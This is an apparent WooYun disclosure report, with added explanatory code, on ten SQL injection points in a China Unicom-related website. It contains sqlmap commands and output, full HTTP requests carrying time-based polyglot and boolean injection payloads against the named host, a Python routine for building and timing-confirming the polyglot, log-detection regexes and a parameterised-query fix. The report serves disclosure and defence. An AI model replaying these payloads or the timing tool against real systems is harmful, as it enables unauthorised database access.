
Vulnerability summary

Defect ID: wooyun-2015-0129847

Title: Carrier security: 10 SQL injection points at China Unicom

Vendor: China Unicom

Author: 路人甲

Submitted: 2015-08-04 12:43

Fix deadline: 2015-09-20 18:42

Published: 2015-09-20 18:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-08-04: Details sent to the vendor; awaiting vendor action
2015-08-06: Vendor confirmed; details visible to the vendor only
2015-08-16: Details disclosed to core white hats and relevant domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

Just trying to make the front page.

Detailed description:

First location:

sqlmap.py -u "http://www.chinaunicom-a.com/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&frametype=4&season=3&size=20&start=1&year=" --current-db


[Screenshot 1.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: fast=1&field=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))uWAF) AND 'ozgN'='ozgN'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&frametype=2&month=&search=&season=&size=16&start=1&year=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
current database: 'ChinaUnicom'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.chinaunicom-a.com:80/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))CULU) AND 'FNqF'='FNqF'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&frametype=4&season=3&size=20&start=1&year=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, JSP
back-end DBMS: MySQL 5.0.12
current database: 'ChinaUnicom'
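
The payload sqlmap settled on above is a polyglot: the same string stays valid SQL whether the handler drops the parameter in unquoted, inside single quotes or inside double quotes, and in each case exactly one sleep() survives outside comments and string literals. (The "total of 0 HTTP(s) requests" in the output is what sqlmap prints when it resumes stored results from its session file instead of re-testing.) The following is an added example, not code from the report or from sqlmap: it builds the payload, shows which sleep() the MySQL parser would actually execute in each quoting context, and runs the median-based timing comparison that confirms a time-based finding. The query templates and the target stub are constructed; the stub never contacts a server or a database, it only sleeps for the live sleep() calls, scaled down so the example finishes quickly.

```python
"""Time-based blind polyglot from the report: what executes, and how to confirm it.

Added example; the target is a constructed stub, not the chinaunicom.do handler.
"""
import time
from statistics import median
from typing import Callable, Dict, List, Optional


def polyglot(seconds: int) -> str:
    """The payload shape used at every POST location in the report.

    cond = if(now()=sysdate(),sleep(N),0); now()=sysdate() is normally true,
    so the if() evaluates sleep(N). The wrapper keeps one copy of cond live
    whichever way the server quotes the parameter:
      unquoted -> cond /* everything after is a comment */
      'single' -> 'cond/*' XOR(cond) OR '"XOR(cond)OR"*/'
      "double" -> "cond/*'XOR(cond)OR'" XOR(cond) OR "*/"
    """
    cond = f"if(now()=sysdate(),sleep({seconds}),0)"
    return f"{cond}/*'XOR({cond})OR'\"XOR({cond})OR\"*/"


# Assumed shapes of a concatenating handler; the report does not show its SQL.
CONTEXTS: Dict[str, str] = {
    "unquoted": "SELECT id FROM content WHERE frametype={}",
    "single": "SELECT id FROM content WHERE field='{}'",
    "double": 'SELECT id FROM content WHERE field="{}"',
}


def executable_sleeps(sql: str) -> List[int]:
    """Arguments of every sleep() in live SQL: outside '...'/"..." literals and
    outside /* ... */ comments. Minimal tokenizer, enough for this payload."""
    found: List[int] = []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c in ("'", '"'):                      # skip a quoted literal
            i += 1
            while i < n and sql[i] != c:
                i += 2 if sql[i] == "\\" else 1  # honour backslash escapes
            i += 1
        elif sql.startswith("/*", i):            # skip a block comment
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif sql[i:i + 6].lower() == "sleep(":
            close = sql.index(")", i + 6)
            found.append(int(sql[i + 6:close]))
            i = close + 1
        else:
            i += 1
    return found


def queries(seconds: int) -> Dict[str, str]:
    """Full SQL the server would run in each assumed context."""
    p = polyglot(seconds)
    return {name: tpl.format(p) for name, tpl in CONTEXTS.items()}


def make_stub_target(context: str, vulnerable: bool = True,
                     seconds_scale: float = 0.02) -> Callable[[str], None]:
    """Constructed stand-in for the endpoint. A vulnerable stub concatenates the
    parameter and sleeps for every live sleep() (scaled down); a fixed stub
    binds the value, so the payload is never parsed and it never sleeps."""
    tpl = CONTEXTS[context]

    def send(payload: str) -> None:
        if vulnerable:
            time.sleep(sum(executable_sleeps(tpl.format(payload))) * seconds_scale)

    return send


def confirm_time_based(send: Callable[[str], None], delay: int = 5,
                       rounds: int = 3, min_gap: Optional[float] = None) -> bool:
    """What a time-based confirmation needs: alternate sleep(0) and sleep(delay)
    requests, compare medians rather than single samples (network jitter), and
    require the gap to approach the requested delay. Against a real target keep
    the default min_gap; the stub below needs one matching its scale."""
    if min_gap is None:
        min_gap = 0.8 * delay
    base: List[float] = []
    slow: List[float] = []
    for _ in range(rounds):
        for payload, bucket in ((polyglot(0), base), (polyglot(delay), slow)):
            t0 = time.perf_counter()
            send(payload)
            bucket.append(time.perf_counter() - t0)
    return median(slow) - median(base) >= min_gap


if __name__ == "__main__":
    for name, q in queries(5).items():
        print(f"{name:8s} live sleeps={executable_sleeps(q)}  {q}")
    print("vulnerable stub:", confirm_time_based(make_stub_target("single"), min_gap=0.05))
    print("fixed stub:     ", confirm_time_based(make_stub_target("single", False), min_gap=0.05))
```

Running it prints the three rendered queries, each with a single live sleep(5), and confirms the vulnerable stub while rejecting the fixed one. Against a real host, keep the default min_gap (80% of the requested delay) and raise rounds when the baseline is noisy.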


Second location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&frametype=2&month=&search=&season=&size=16&start=1&year=


[Screenshot 2.jpg]


Third location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=

(The body as recorded carries no injection string, so the affected parameter at this location cannot be identified from the request shown here; the Content-Length of 208 matches the payload-bearing bodies at the fourth, sixth and eighth locations.)


[Screenshot 3.jpg]


Fourth location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&season=&size=16&start=1&year=


Fifth location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 1136
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_GVYKMYTBQI
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TNFOEBSVKH
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="fast"
1
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="field"
ltgg
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="frametype"
9
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="imageField2"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="month"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="search"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="search2"
e%' AND 3*2*1=6 AND '000WQWL'!='000WQWL%
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="season"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="size"
10
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="start"
1
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="year"
2015
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="year1"
-------AcunetixBoundary_TNFOEBSVKH--


Sixth location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&size=16&start=1&year=


Seventh location:

http://www.chinaunicom-a.com:80//chinaunicom.do?field=dqbg&frametype=4&season=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&size=20&start=1&year=


Eighth location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/


Ninth location:

POST /chinaunicom.do HTTP/1.1
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
field=pgsms&frametype=7&month=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&search=&season=&size=20&start=1&year=


Tenth location:

POST /search.do HTTP/1.1
Content-Length: 345
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_BAXFSAEFBU
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_XTWDESPVHX
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="field"
index
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="imageField"
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="search"
-1' OR 3*2*1=6 AND 000711=000711 --
-------AcunetixBoundary_XTWDESPVHX--
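
All ten locations use two payload families: the sleep()-based polyglot and the Acunetix boolean probes (`3*2*1=6`, `'000WQWL'!='000WQWL%`). Either leaves recognisable traces, but only in requests whose parameters are in the URL: a plain Apache access log records the query string of the first and seventh locations and nothing of the eight POST bodies, which would need a WAF or ModSecurity audit log with request-body logging to catch. The following is an added detection example, not part of the report or of any vendor tooling. The log lines are constructed in Apache combined format from the GET requests above, with invented client addresses and timestamps; the indicator names and the strong/weak scoring are this example's own choices.

```python
"""Access-log detection for the injection patterns shown in this report.

Added example. LOG_LINES are constructed; addresses and timestamps are invented.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample: line 1 carries the seventh-location payload, line 4 the
# tenth-location probe, line 2 is a POST whose body the access log never sees,
# line 3 is a benign request.
LOG_LINES = [
    '203.0.113.10 - - [04/Aug/2015:12:40:01 +0800] "GET /chinaunicom.do?field=dqbg&frametype=4&season=(select(0)from(select(sleep(0)))v)/*\'%2b(select(0)from(select(sleep(0)))v)%2b\'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&size=20&start=1&year= HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [04/Aug/2015:12:40:02 +0800] "POST /chinaunicom.do HTTP/1.1" 200 5123 "http://www.chinaunicom-a.com:80/" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Aug/2015:12:41:10 +0800] "GET /chinaunicom.do?field=glzd&frametype=2&size=16&start=1&year=2015 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [04/Aug/2015:12:42:00 +0800] "GET /search.do?field=index&search=-1%27+OR+3*2*1%3D6+AND+000711%3D000711+-- HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

# Apache combined format: client, identity, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Matched against the decoded, lowercased, whitespace-collapsed URI.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "sleep_call": re.compile(r"\bsleep\s*\("),
    "now_eq_sysdate": re.compile(r"now\(\)\s*=\s*sysdate\(\)"),
    "nested_select": re.compile(r"\(\s*select\b"),
    "arith_probe": re.compile(r"\d+\s*\*\s*\d+\s*\*\s*\d+\s*=\s*\d+"),
    "quote_boolean": re.compile(r"'\s*(or|and|xor)\b"),
    "sql_comment": re.compile(r"(--|/\*)"),
}
# A single strong indicator is enough; weak ones (a quote before OR, a comment
# marker) need corroboration, since they occur in legitimate free-text searches.
STRONG = {"sleep_call", "now_eq_sysdate", "nested_select", "arith_probe"}


def decode_uri(uri: str, max_rounds: int = 3) -> str:
    """URL-decode until stable (bounded) so double encoding such as %2527 does
    not hide a quote, then normalise case and whitespace for matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(uri)
        if decoded == uri:
            break
        uri = decoded
    return re.sub(r"\s+", " ", uri.lower())


def is_suspicious(names: List[str]) -> bool:
    return bool(STRONG & set(names)) or len(names) >= 2


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per suspicious request: client, method, path and the
    indicator names that fired, in INDICATORS order."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparsable line: skip, do not crash
        text = decode_uri(m.group("uri"))
        names = [n for n, rx in INDICATORS.items() if rx.search(text)]
        if is_suspicious(names):
            hits.append({
                "ip": m.group("ip"),
                "method": m.group("method"),
                "path": m.group("uri").split("?", 1)[0],
                "indicators": names,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

The two GET lines are flagged (sleep() plus nested SELECT and a comment marker for the seventh location; the arithmetic probe, quote-then-OR and `--` for the tenth), while the POST line passes clean even though the original request carried the same polyglot in its body. That gap is the practical point: for the POST endpoints, detection has to run where the body is visible.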

Proof of vulnerability:

Remediation:

Parameter filtering: validate every parameter against its expected form before it reaches the query (integers for frametype, size and start; a fixed allow-list for the field codes such as glzd, ltgg, dqbg and pgsms; a four-digit year), and pass values to MySQL through bound parameters (PreparedStatement on this JSP stack) rather than concatenating them into the SQL text.
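
The following is an added remediation example, not the report's or the site's code. It puts the concatenating pattern the report exploits next to a parameterised, allow-listed version and drives both with the boolean probes copied from the fifth and tenth locations. sqlite3 stands in for the MySQL backend, and the `content` table with its columns and rows is an assumption, since the report shows only request parameters and field codes.

```python
"""Vulnerable concatenation beside a hardened query, driven by the report's probes.

Added example; sqlite3 stands in for MySQL and the schema is assumed.
"""
import re
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample rows standing in for the site's content table.
ROWS = [
    (1, "glzd", 2015, "quarterly report"),
    (2, "ltgg", 2015, "announcement"),
    (3, "pgsms", 2014, "internal memo"),
]

# Field codes seen in the report's requests; the handler should accept no others.
FIELD_CODES = {"glzd", "ltgg", "dqbg", "pgsms"}

# Probes copied from the fifth (search2) and tenth (search) locations.
TRUE_PROBE = "e%' AND 3*2*1=6 AND '000WQWL'!='000WQWL%"
FALSE_PROBE = "e%' AND 3*2*1=7 AND '000WQWL'!='000WQWL%"
TAUTOLOGY = "-1' OR 3*2*1=6 AND 000711=000711 --"


def fresh_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE content(id INTEGER, field TEXT, year INTEGER, title TEXT)")
    con.executemany("INSERT INTO content VALUES (?, ?, ?, ?)", ROWS)
    return con


def search_vulnerable(con: sqlite3.Connection, field: str, search: str,
                      year: Optional[str] = None) -> List[Tuple[int, str]]:
    """The pattern the report demonstrates: each parameter is spliced into the
    SQL text, so a quote in `search` ends the literal and a bare expression in
    `year` is evaluated by the parser."""
    sql = "SELECT id, title FROM content WHERE field='%s' AND title LIKE '%%%s%%'" % (field, search)
    if year:
        sql += " AND year=%s" % year
    return con.execute(sql).fetchall()


def like_literal(s: str) -> str:
    """Escape LIKE metacharacters so bound user text matches literally; binding
    alone stops injection but leaves % and _ as wildcards."""
    return re.sub(r"([\\%_])", r"\\\1", s)


def search_hardened(con: sqlite3.Connection, field: str, search: str,
                    year: Optional[str] = None) -> List[Tuple[int, str]]:
    """Allow-list the enumerated code, type-check the integer, bind everything."""
    if field not in FIELD_CODES:
        raise ValueError("unknown field code")
    if year is not None and not re.fullmatch(r"\d{4}", year):
        raise ValueError("year must be a four-digit number")
    sql = "SELECT id, title FROM content WHERE field=? AND title LIKE ? ESCAPE '\\'"
    params: list = [field, "%" + like_literal(search) + "%"]
    if year is not None:
        sql += " AND year=?"
        params.append(int(year))
    return con.execute(sql, params).fetchall()


if __name__ == "__main__":
    con = fresh_db()
    print("vulnerable, true probe :", search_vulnerable(con, "glzd", TRUE_PROBE))
    print("vulnerable, false probe:", search_vulnerable(con, "glzd", FALSE_PROBE))
    print("vulnerable, tautology  :", search_vulnerable(con, "glzd", TAUTOLOGY))
    print("hardened,   tautology  :", search_hardened(con, "glzd", TAUTOLOGY))
    print("hardened,   normal     :", search_hardened(con, "glzd", "report", "2015"))
```

Against the vulnerable function the true and false probes return different row sets (the boolean oracle Acunetix relies on) and the tautology returns every row regardless of field; against the hardened one the same strings are ordinary search text and match nothing, and the polyglot from the eighth location is rejected by the year check before any SQL is built.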

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Rank: 12

Confirmed: 2015-08-06 18:41

Vendor reply:

CNVD has confirmed and reproduced the described issue and has forwarded it through CNCERT to China United Network Communications Co., Ltd., which will coordinate handling with the website's administration department.

Latest status:

None yet